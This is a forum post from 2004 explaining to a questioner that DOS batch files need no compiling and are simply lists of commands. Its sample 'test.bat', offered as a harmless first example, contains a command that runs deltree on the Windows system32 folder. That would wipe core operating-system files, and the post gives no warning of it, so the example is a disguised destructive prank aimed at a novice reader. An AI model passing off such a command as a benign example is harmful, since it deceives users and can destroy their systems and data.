|
g0dzuki
Advanced Member
    
State of Euphoria
2428 Posts |
Posted - 08/02/2004 : 07:50:23 AM
|
What's a batch compiler? DOS Batch is just a group of commands... there's nothing to compile. You create a file, call it "test.bat" and in the contents list the commands you want to run:
@ECHO OFF
cd / cd windows deltree system32
pause
exit
Batch files aren't nearly as useful as they were 10 years ago... but there still fun to play with.
If you need a list of commands type "dos commands' in Google or goto Microsoft's web site.
( g0dzuki )--(~/)-->
"I wish it was time for Cheers, but it's not... it's time for vengeance." --The Maxx |
 |
|